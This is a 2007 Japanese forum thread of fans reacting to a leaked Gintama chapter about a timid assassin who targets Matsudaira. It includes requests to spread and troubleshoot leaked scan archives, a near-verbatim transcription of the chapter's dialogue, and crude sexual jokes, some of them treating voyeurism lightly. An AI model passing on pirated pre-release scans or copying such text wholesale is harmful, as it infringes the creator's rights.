何来週wwwwバロスww
表紙の銀さんかっけええ中は(´・ω・`)

157 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:31:59 ID:OG9C71R10
ニヤリと笑う銀さん、悪だなw

158 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:44:38 ID:dZHav7x30
>>141
ありがとう

159 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:54:44 ID:InbvjiHW0
空知先生どうした
3周年表紙以来、女の子の肌を描くのに躊躇が無くなったようだがww

160 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:55:38 ID:RZS884ZUO
言うなw

161 :名無しさんの次レスにご期待下さい:2007/02/08(木) 04:10:37 ID:w3GYkDPY0
銀さん裸ぐらいで鼻血とはw
新八と神楽に遠慮してエロ本,AV断ちでもしてるのかww

162 :名無しさんの次レスにご期待下さい:2007/02/08(木) 04:14:51 ID:s4Wk7xV90
少年漫画の主人公が女の裸見て鼻血垂らすのは基本中の基本だろう

163 :名無しさんの次レスにご期待下さい:2007/02/08(木) 04:22:38 ID:w3GYkDPY0
銀時の代わりに桂でもウケたと思う

164 :名無しさんの次レスにご期待下さい:2007/02/08(木) 04:27:19 ID:Y18651u60
お決まりの鼻血も銀魂でやるとなんか違和感あるな。

165 :名無しさんの次レスにご期待下さい:2007/02/08(木) 04:43:21 ID:v0bemooA0
つーか作戦失敗で、消されるんじゃないか、亀。

166 :名無しさんの次レスにご期待下さい:2007/02/08(木) 05:09:01 ID:t7tLRYQz0
来週はなかなか面白いな個人的には。

167 :名無しさんの次レスにご期待下さい:2007/02/08(木) 06:04:55 ID:XGCpIAD20
このレベルで鼻血って銀さん実は童貞なんじゃ

168 :名無しさんの次レスにご期待下さい:2007/02/08(木) 06:10:13 ID:uqcf0Ya6O
そんな20半ばの男気持ち悪過ぎるだろ
つか銀楽編で非童貞仄めかしてた

169 :名無しさんの次レスにご期待下さい:2007/02/08(木) 06:34:56 ID:XGCpIAD20
軽い冗談も流せない銀時腐乙

170 :名無しさんの次レスにご期待下さい:2007/02/08(木) 08:07:33 ID:BCklgGBr0
なんかミョーに静かな回だったな

つか空知の今の心情なんだろかね>スナイパー

171 :名無しさんの次レスにご期待下さい:2007/02/08(木) 08:49:19 ID:oPmcMnYH0
きっとマンションのおねーさんすげかったんだよ。
なんか一人でイロイロやりだしちゃったんだよ。
銀さんが童貞だなんてそんな。
裸くらいで鼻血だすわけねーよ。

172 :名無しさんの次レスにご期待下さい:2007/02/08(木) 08:59:56 ID:qS7m5vYSO
あれくらいで鼻血を出していたら最近のジャンプ読めない

173 :名無しさんの次レスにご期待下さい:2007/02/08(木) 09:05:22 ID:InbvjiHW0
百数十メートル離れたマンションの部屋を覗ける銀さんはスゴイが
それに気づいたおねえさんもすごい

>>170
途中まで誰も喋らなかったからじゃないかw

174 :名無しさんの次レスにご期待下さい:2007/02/08(木) 09:19:25 ID:v78VR3EXO
できたらでいいので簡易文字バレお願いします…

175 :名無しさんの次レスにご期待下さい:2007/02/08(木) 09:38:26 ID:InbvjiHW0
1 散らかった部屋でモノローグ 布団から起き上がる人物
2 カメにエサをやり窓の脇においてある物からかぶせてある布を取る→銃
3 ゲストキャラ「亀」。笠かぶって亀甲模様のマスク。スナイパー。松平公がターゲットらしい
4 照準を合わせていくと銀さんがいる
5 扉絵 ライトに照らされる、スーツ着て銃構えた銀さん アオリ:標的(ターゲット)は外さない 危険な瞳の狙撃手(スナイパー)!!
  題百五十二訓 人の短所見るより 長所を見つけられる人になれ
6 亀と銀さんがスコープ越しに目が合う。
7 計画が漏れたと慌てる亀。ベンチにだらっと座って亀の方を見る銀さん
6 亀、銀さんの目を獣と感じ、怯える。亀のいるマンションの下の階でカーテン開けっ放しのまま女性が着替えている
7 悪どい感じに笑う銀さん。さらに怯える亀。目を細めてマンションを注視する銀さん
8 女性、ブラジャーのホックに手を掛ける。身を乗り出す銀さん。スナイパーは引き金を引いた。銀さんの足元、ベンチと地面に血が落ちる

176 :名無しさんの次レスにご期待下さい:2007/02/08(木) 09:40:34 ID:InbvjiHW0
なんか数字間違えた
ここまでで10ページ

177 :名無しさんの次レスにご期待下さい:2007/02/08(木) 09:52:40 ID:InbvjiHW0
11 鼻血を流す銀さん。ライフルの弾は地面に当たった。女性を連れた同心に声を掛けられる銀さん
12 同心達が援軍だと勘違いする亀。女性はさっきの着替えてた人。銀さんは言い訳しつつ署に引っ張られようとしてる。マンションの方角を指差す。そこへ亀の部屋にチャイムが鳴る
13 チャイムを鳴らしたのは大江戸新聞の勧誘人(長谷川泰三38歳)。敵と勘違いする亀。逃げようとベランダに出る
14 外には大勢の人。驚愕する亀。亀の部屋の上に人影かある
15 沢山の人をさっきの銀さんの仕業と勘違いする亀。上の階では飛び降り自殺しようとする女性。銀さんは「やめろ〜」とか言っている
16 亀は死を予感する。後ろで亀のペット、カメの亀吉は泣いていた。メスの亀吉は卵を産んでいた。亀吉を卵を救うために生きようと決心する亀
17 逃げるため、ベランダから向かいの建物に移ろうと飛び出す亀。
18 落ちてきた女性と空中でぶつかる。二人とも地面に落ちる。湧き上がる群集
19 亀に集まる賞賛の嵐。松平公から表彰される。肩に乗った亀吉を見やり、亀モノローグ「ま いっか」
  アオリ:殺し屋卒業!!

178 :名無しさんの次レスにご期待下さい:2007/02/08(木) 11:14:47 ID:waUSvjO0O
乙!
銀さんアホ過ぎるw
つか警察から逃げてきたのか?

179 :名無しさんの次レスにご期待下さい:2007/02/08(木) 12:00:02 ID:w2PR5yD80
地味に笑える話だったww
勘違いのまま話進んで最後成功するってのは読んでる側には愉快だ

というか今回絵綺麗じゃね?銀さんくらいしかアップないけど

180 :名無しさんの次レスにご期待下さい:2007/02/08(木) 12:46:17 ID:RvHFKA2t0
やめろ〜って言ってる銀さんの顔がwwwwwww
誰だよあれwww

181 :名無しさんの次レスにご期待下さい:2007/02/08(木) 13:11:45 ID:le+jqMuA0
>>141のファイル壊れてる(´;ω;`)

182 :名無しさんの次レスにご期待下さい:2007/02/08(木) 13:17:50 ID:IG3YK2xs0
んなこたぁない

183 :名無しさんの次レスにご期待下さい:2007/02/08(木) 13:20:24 ID:JUUViR7k0
今北壊れてる

184 :名無しさんの次レスにご期待下さい:2007/02/08(木) 13:27:42 ID:SHEArONz0
んなこたぁない
今やってみたが、ちゃんと落とせたし解凍できたぞ

新聞勧誘屋、マダオだったなw
今回は銀さんに邪魔されずに仕事できたんだな

185 :名無しさんの次レスにご期待下さい:2007/02/08(木) 13:32:07 ID:le+jqMuA0
>>148
うそ!?解凍はできるけどエラーおこしてファイルの中なんもないお

186 :名無しさんの次レスにご期待下さい:2007/02/08(木) 13:34:16 ID:IJbFLa8Q0
マックOSで固めてるっぽいから、Winだと相性みたいなのがあるかも。

187 :名無しさんの次レスにご期待下さい:2007/02/08(木) 13:46:56 ID:TQYP3KOw0
100%の60で頂いた詰めに…



188 :名無しさんの次レスにご期待下さい:2007/02/08(木) 13:54:11 ID:flOCW0KB0
>>185
解凍しなくて読める手段考えなさいよー
中身ホンモノ、画質わるいけど

殺し屋、鼻血、感謝状wwwww

189 :名無しさんの次レスにご期待下さい:2007/02/08(木) 13:55:38 ID:UIq4BLYo0
>>185
OSがWinXPでLhaplus使って解凍したけどちゃんとあったヨ

190 :名無しさんの次レスにご期待下さい:2007/02/08(木) 13:57:04 ID:le+jqMuA0
>>186
なるほど…!

>>187
見れました!!!
神様ありがとう!

>>188
解凍しなくて読める手段…?すみません勉強不足ですorz

191 :名無しさんの次レスにご期待下さい:2007/02/08(木) 14:06:46 ID:OG9C71R10
あーMacで固めてる。自分が拡散するといつも読めない人が少数いたりする。ごめんね

192 :名無しさんの次レスにご期待下さい:2007/02/08(木) 14:14:26 ID:0+TuZPRF0
スナイパー「昔どこかの軍師が言ったそうだ 戦を必勝に導く名軍師とは誰より臆病な奴のことだと
      臆病な奴は不測の事態におびえ万全の準備を整えることができる
      臆病な奴は絶対に勝てる条件が揃うまで戦はしない まったく偉い事を言った奴がいたもんだ
      おかげで俺はこんな汚い部屋に3ヶ月近くこもるハメに合っている
      だがこいつは軍師の話だ 臆病なだけでは戦には勝てない戦に勝つにはもう一つ必要なものがある
      大群に突撃する勇敢な兵士達つまり一匹狼の俺は臆病な軍師であり勇敢な兵士にもならなければならない
      難儀な話だ どうやら俺は軍師の才は微かにあるらしいが兵士としてはからっきしらしい
      この仕事について二十年たつが仕事の前は毎度震えが止まらない 
      練りに練った作戦と絶対に安全な隠れ蓑に身を隠しエサがきた時のみ食らいつく
      そんな臆病な俺の仕事を見て口の悪い奴はこう言った臆病で愚鈍お前はまるで亀だ
      その日から俺は殺し屋「亀」と呼ばれるようになった まったく呑気な名前だろう
      誰が江戸一番の殺し屋なんて思うものか そうさ俺を最強の殺し屋なんていう輩もいるがそいつは違う
      俺は江戸一番臆病なだけだ 俺がこんな物騒な獲物の扱いに長けたのは
      素手で標的を殴り殺す力も度胸もないからだ 俺が絶対に的を外さないのは報復を恐れているからだ
      俺が金さえ積まれれば誰だろうと殺すのは老後の生活を心配しているからだ
      標的は日曜の午後公園を犬の散歩にくる幕府の某(とっつぁん)という情報が入っているがそれさえわかれば俺には充分だった
      あとは俺の手の震えが止まるのを待つだけだった甲羅の中から援軍が出てくるのを待つだけだ だが…
      俺の手の震えがおさまる事はなかった 俺の前に現れたその男は臆病な軍師でも勇敢な兵士でもまして標的でもないそいつは…」

標的は外さない 危険な瞳の狙撃手!! 第百五十二訓 人の短所を見るより長所を見つけられる人になれ

193 :名無しさんの次レスにご期待下さい:2007/02/08(木) 14:17:05 ID:le+jqMuA0
>>191
いやしょうがないですよ!
拡散して下さるだけでも有り難いです

194 :名無しさんの次レスにご期待下さい:2007/02/08(木) 14:25:04 ID:UIq4BLYo0
このサブタイは身につまされるな…(´・ω・`)

195 :名無しさんの次レスにご期待下さい:2007/02/08(木) 14:25:33 ID:k9g51xGxO
空知まいどのことながらセリフ量すげーな!
バレ氏さん乙です!
携帯だから文字バレwktk

196 :名無しさんの次レスにご期待下さい:2007/02/08(木) 14:49:22 ID:0+TuZPRF0
亀「……?なんだこの男はこっちを…見ている?なんで…こっちを見ているまさか俺の存在に…
  いやありえん公園からここまでは百数十メートル以上離れているむこうから見れば俺の銃口は
  針の穴程にしか見えないはず …………… いや見ている!あの男間違いなく俺を見ている
  俺の異変を察してか背後の水槽で亀吉が騒ぐのがきこえる 亀吉どうやら俺はドジふんじまったらしい
  この暗殺計画を実行するまで仕込みもいれて半年かかった何度も標的を殺れる機会はあった
  それでも粘りに粘ったのは標的を確実に殺るだけじゃなく何より俺の安全を確保するためだった
  情報漏洩などもっての他誰にも接触せず文字通り亀のように甲羅の中でじっと息をひそめていた…なのに
  何故もれた!!あの男…間違いなく松平公暗殺計画に気づいている!!計画が露見していた以上
  松平公が公園にくる事はありえない 俺は逃げるべきだった だが俺の身体はピクリとも動かない
  その男の刺すような視線がそれを許さない 俺の本能がかつてない危険信号をあげる…コイツはヤバイ
  松平の手の者ではない恐らく奴が雇った剣客…いやそんな生ぬるい者ではないあの目は獣…血を求め魂を狩る獣の目だ
  一瞬でも目をそらせば殺される」
着替えるお姉さん見て笑ってる銀さん
亀「!! わ… 笑っている!!この状況で…銃口をむけられながら笑っているだと…何という男だァァ!!
  挑発…俺を挑発している 俺とサシで殺り合うつもりだ この距離でまさかあの木刀を使うわけもない
  何かとんでもない隠し玉をもっているあの笑みはバズーカ的ないや…ロケットランチャー的なものを持っている
  いや核ミサイル的である可能性も捨てきれんそんなものを撃たれたらひとたまりもないぞ」
目を細める銀さん 今にもブラ外しそうなお姉さん 銀時「おっおっマジで」 ビクッとし銃撃ってしまう亀
亀「無意識のうちに俺は銃のひきがねを引いていた 長年の殺し屋としての勘そして臆病者がゆえの危機察知能力が
  頭より身体を先に動かしたのだ俺の勝利を祝ってか背後の水槽で亀吉が騒ぐのがきこえる
  亀吉 祝福よりアイツに祈りをくれてやりな」
血を出す銀さんだがそれは鼻血
亀「って鼻血ィィィィィ!?ライフルで撃たれて鼻血で終わりだとォ!?
  バ…バカな…ライフルだぞライフルあたって鼻血って小学生のドッジボール大会じゃないんだから
  弾丸がきかないというのか奴には…信じられんなんという男だ!!
  あんな化け物を相手にしていたら命が幾つあっても足りんなんとか逃げる方法を !!」
弾丸はベンチの下にあたってる

197 :名無しさんの次レスにご期待下さい:2007/02/08(木) 15:21:51 ID:0+TuZPRF0
亀「あれは…同心!?バ…バカなァァァァァァ!!」
お姉さん「この人ですジロジロ見てたの」銀時「は?」同心「君かのぞきしてたっていうのは」
亀「いつの間に援軍を呼んでいたというのだ 奴はァァ!!連絡をとっている素振りなど少しも見せなかったはず
  一体どうやって…………!!」
銀時「いやのぞいてませんよ」同心「鼻血でてるよ」
亀「あれは!!鼻血の血痕がヘルプと描いている!!ように見えなくもない なっ…なんという男だァァ!!
  まさか自らの鼻血を使って援軍を呼んでいたというのか!! !! あれは!!何か指示を出している」
銀時「だってあんなベローンってカーテンあけてたらいやでも目に入ってくるでしょそらァ見ますよ」
同心「いいからちょっと署まで来なさい」
ピンポーン
???「すいませーん大江戸新聞ですけどおたくどっかの新聞とかとってますかね」
亀「!!バッバカなァァァァ!!新聞屋なんかじゃない!!これは………」
マダオ「すいませーん」
亀「すでに俺の部屋は敵に包囲されているというのかァ!!なんという根回しの良さ!!
  これでは脱出もままならない!!俺の焦りを見 諦観したのか背後の水槽で亀吉は音もたてない
  亀吉 最後まで諦めるな!!ベランダ!!こうなったらベランダから飛び降りて脱出するしか…」
亀「!!」ベランダ側の外には大勢の人が
亀「バッ バカなァァァァァァァァァァァァ!!な…ななな なんで こんなに いんのォォォ!!
  一瞬で こんな どーいうことだァァ!! 一体どうやってこれだけの人数を集めたというのだ
  全員が敵意むきだしで俺を見つめている!!!」
死んでやるぅぅぅと叫びながら今にも自殺しそうな上の階の女の人
銀時「お前何やってんだ!!バカなマネはやめろ〜〜」
亀「バカなマネ?『バカなァァァ!!』をやめろというのかしかしこの状況はどうみてもバカなァァァ!!」
銀時「死にたいのか〜〜!そこから動くんじゃねーぞ」
亀「動けばハチの巣だだが動かなくても殺られる事は必定」
銀時「今からそっちにいくぞォ待ってろ!!」
亀「!! 甲羅に潜っていようが甲羅から出ようが待つのは死 臆病に死ぬか勇敢に死ぬか
  いやそれを選ぶ権利は殺し屋の俺にはなかった 俺の感傷をしってかしらずか背後の水槽で亀吉は泣いていた
  ………え?っていうか泣いてる? 『!! 泣いてる!! 卵!!』 俺がつけた名前を知ってかしらずか
  背後の水槽で亀吉はメスだった」

198 :名無しさんの次レスにご期待下さい:2007/02/08(木) 15:33:17 ID:0+TuZPRF0
亀「そう 殺し屋に死に方なんぞは選ぶ権利はない だったら死ななければいい俺は最後まで生きよう
  今まで散々臆病に命を奪ってきた俺だが今度はこの新しい命を護るため臆病になる
  勝てない戦は逃げるが勝ちだ 亀吉むこうの建物にいちかばちか飛び移るぞ
  俺の震えはいつの間にか止まっていた あともうちょい!ちょっとでとど…」
ちょうど亀の上に落ちてくるさっきの自殺しそうだった女の人
周りの人達「助かったァァァ!!」「スゴイ!!奇跡よ!!」「下の人がクッションになって!!」
     「こんな勇敢な人見たことないわ!」「しっかりして!!」「オイすぐに運べこの勇敢な人を助けるんだァ!!」
とっつぁん「え── 貴殿の勇敢な行動を称えこの賞状と記念品を贈ります警察庁長官松平片栗虎 よくがんばったな」
亀「ま いっか」
おわり

199 :名無しさんの次レスにご期待下さい:2007/02/08(木) 16:00:46 ID:bDYedYbaO
詳細バレしてくれた人d
亀いいキャラだなw
相変わらずセリフ量すげー

200 :名無しさんの次レスにご期待下さい:2007/02/08(木) 16:10:02 ID:r1vgkNgp0
ウーマンが濃すぎたせいか
何かあっさりしてる様に感じる

201 :名無しさんの次レスにご期待下さい:2007/02/08(木) 17:10:26 ID:k9g51xGxO
ま、いっかってなんだよww
しっかりしろ亀w
バレ氏さんすごいセリフ量なのに乙です!!

亀の顔だけでいいので画バレしてくれる人いませんか〜?

202 :名無しさんの次レスにご期待下さい:2007/02/08(木) 17:43:26 ID:3zCrlZ2R0
久々に銀魂で笑った
サブタイは近藤が昔同じようなこと言われてたような

203 :名無しさんの次レスにご期待下さい:2007/02/08(木) 17:47:44 ID:bIfZptVxO
文字バレ氏乙
冒頭の語りに既視感あると思ったら阿国の回の全蔵の語りとそっくり
空知こんなん好きだな

204 :名無しさんの次レスにご期待下さい:2007/02/08(木) 17:52:28 ID:z0N49uHc0
BLEACH★473だった

205 :名無しさんの次レスにご期待下さい:2007/02/08(木) 18:15:08 ID:klhTDgJmO
亀結構かっこいいな。
NARUTOの我愛羅に似てる

206 :名無しさんの次レスにご期待下さい:2007/02/08(木) 18:36:49 ID:ypSw+Y/Z0
この仕事について二十年ってことは
亀って結構おっさんなのか

207 :名無しさんの次レスにご期待下さい:2007/02/08(木) 18:38:08 ID:0+TuZPRF0
二十年前ってあれだな天人きた年あたり

208 :名無しさんの次レスにご期待下さい:2007/02/08(木) 18:45:43 ID:IJbFLa8Q0
これ、アニメ化したらほとんど1人芝居だな。

209 :名無しさんの次レスにご期待下さい:2007/02/08(木) 18:50:10 ID:HUXaRRjLO
>>141消えてた…?
他ないよな…あの、よければ拡散…お願いします

210 :名無しさんの次レスにご期待下さい:2007/02/08(木) 18:56:18 ID:XYWfPZRf0
携帯で落とせるのか?

211 :名無しさんの次レスにご期待下さい:2007/02/08(木) 18:58:34 ID:Nc3lpfpz0
http://www.geocities.jp/oda_eiichirou/











212 :名無しさんの次レスにご期待下さい:2007/02/08(木) 19:00:42 ID:dRaQRTg40
ていうかとっつぁん暗殺依頼したの誰?攘夷側??

213 :名無しさんの次レスにご期待下さい:2007/02/08(木) 19:01:35 ID:mEf4mbiB0
なんで松平が狙われるんだ?

214 :名無しさんの次レスにご期待下さい:2007/02/08(木) 19:04:37 ID:yQRdvhc40
幕府の犬のトップだからだろ
あんなおっさんでも

215 :名無しさんの次レスにご期待下さい:2007/02/08(木) 19:19:09 ID:k9g51xGxO
依頼主が伏線かもな

216 :名無しさんの次レスにご期待下さい:2007/02/08(木) 19:23:30 ID:UIq4BLYo0
キャバクラの回のせいか、とっつぁんはひより身な幕府重鎮の中で
孤立しがちな将軍兄妹の事を護ろうとしているイメージがあるんだが…。

217 :名無しさんの次レスにご期待下さい:2007/02/08(木) 19:23:50 ID:zuKH5bVQ0
初心者ガンオタとして一言。
普通狙撃にライフルは使わない。狙撃銃とライフルは違う。

ゴルゴは作者が勘違いしてたんだ。

218 :名無しさんの次レスにご期待下さい:2007/02/08(木) 19:24:30 ID:IJbFLa8Q0
まあおっさんの80%は正しさだから、悪い人じゃないよ。

219 :名無しさんの次レスにご期待下さい:2007/02/08(木) 19:49:20 ID:RvHFKA2t0
>>217
知らなかった…

ライフル使って狙撃してる漫画とか小説けっこう多いよな

220 :名無しさんの次レスにご期待下さい:2007/02/08(木) 19:52:13 ID:dRaQRTg40
>>218
マダオなんてひとつも悪いところないのに結構やられてる
そこが銀魂クオリティ

221 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:00:17 ID:uqcf0Ya6O
>>219
世界一腕の立つ殺し屋とかな

222 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:05:18 ID:IJbFLa8Q0
ライフルってライフリングのある小銃のこったろ?
狙撃銃もあるんじゃね?スナイパーライフルとか言うし。

223 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:10:26 ID:HUXaRRjLO
>>210ネタバレの時は携帯とパソコン使い分けてる。
割りと便利。

224 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:18:01 ID:waUSvjO0O
亀吉が涙流すとこかあいかった

225 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:19:42 ID:EAIQC1gLO
今回結構好きだな
これといって爆笑ポイントは無かったけど、読後感がすげー良かった
何となくせんぷうきの回のオチ思い出した

226 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:21:27 ID:YxW3aCvRO
ライフルって狙撃に適してる銃なんじゃないのか?素人だからサッパリだ。まあ「その綺麗な顔を(ry」ぐらいは解るが。

227 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:27:55 ID:wQPU+C790
銀さんの笑顔ワロスwww

228 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:38:45 ID:4F7zjY/80
銀さん毎日のぞきに来てたっぽくね?
脱いでる途中なのにすぐに同心とのぞかれた女性がくるのはおかしかろう。

229 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:41:34 ID:mSXKpZx40
>>228 君は何をそんなにこだわっているんだw

230 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:41:59 ID:bIfZptVxO
裸見たいならさっちゃんに頼めばいいのに

231 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:55:55 ID:4F7zjY/80
こだわるよw

脱いでた人は囮で被害者の女性と同心がどこかに潜んで銀さんがくるのを待ち構えていた。

いつも女性が着替える時間に銀さんが来ていつものように出歯亀。

いつもはブラまでとらないのに今日はブラをとったので鼻血を出す。

捕まりそうになる。

自殺のどさくさで逃げる。

ん?出歯亀と亀かけてる?



232 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:58:56 ID:wx0MVljhO
さっちゃんでは萌えないんだろ…。んなこと頼んだら後が怖いし

233 :名無しさんの次レスにご期待下さい:2007/02/08(木) 21:03:35 ID:uqcf0Ya6O
多分銀さんは積極的な女よりおとなしめの女が好きなんじゃね
さっちゃんあんなにエロくて可愛いんだし、攻め方変えれば上手く行くんじゃ

234 :名無しさんの次レスにご期待下さい:2007/02/08(木) 21:05:22 ID:Po14rCPIO
覗きってのは対象が素人だからいいんだよ
そういう意味でさっちゃんじゃダメ

235 :名無しさんの次レスにご期待下さい:2007/02/08(木) 21:08:18 ID:k9g51xGxO
どうみても銀さんはさっちゃんに対して引いてるしな。
亀って我亜羅みたいな顔なのか?亀吉は?

236 :名無しさんの次レスにご期待下さい:2007/02/08(木) 21:12:20 ID:UIq4BLYo0
>>217
真選組が使ってるあれ。
バズーカじゃなくてロケットランチャーに見えるんだけど…。
そこんとこはどうでもいいのか?


237 :名無しさんの次レスにご期待下さい:2007/02/08(木) 21:37:41 ID:GETrbH+Y0
カクサンおね

238 :名無しさんの次レスにご期待下さい:2007/02/08(木) 21:55:55 ID:TQYP3KOw0
"亀"の産卵は感動するよね

239 :名無しさんの次レスにご期待下さい:2007/02/08(木) 21:57:32 ID:kiXJQ7nW0
海亀はよく見ると目つきが悪い

240 :名無しさんの次レスにご期待下さい:2007/02/08(木) 22:01:38 ID:KJFW8Tyq0
>>230
AV嬢の裸より素人の裸の方が萌えるだろ
そういう事だ

241 :名無しさんの次レスにご期待下さい:2007/02/08(木) 22:04:52 ID:Xa2tWPke0
腐女子はさっちゃんが嫌いだからここぞとばかりに否定するんだな

242 :名無しさんの次レスにご期待下さい:2007/02/08(木) 22:05:46 ID:O0UFAUoL0
なんか今週の銀さんアラレちゃんのセンベエさん思い出した
ターボくんが事故に合う回のアレ

243 :名無しさんの次レスにご期待下さい:2007/02/08(木) 22:06:24 ID:J7jxDp/40
>>238
d

244 :名無しさんの次レスにご期待下さい:2007/02/08(木) 22:10:28 ID:v2ADuhaZ0
やっぱ空知、一話完結式向いてるわw
気持ちのいいオチだったよ

245 :名無しさんの次レスにご期待下さい:2007/02/08(木) 22:14:33 ID:uqcf0Ya6O
いやさっちゃん可愛いだろ
健気だし何よりエロいのがいい
ああいうタイプは絶対処女

246 :名無しさんの次レスにご期待下さい:2007/02/08(木) 22:16:23 ID:omddJjU0O
馬鹿が多いな
処女とか夢見すぎ

54 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)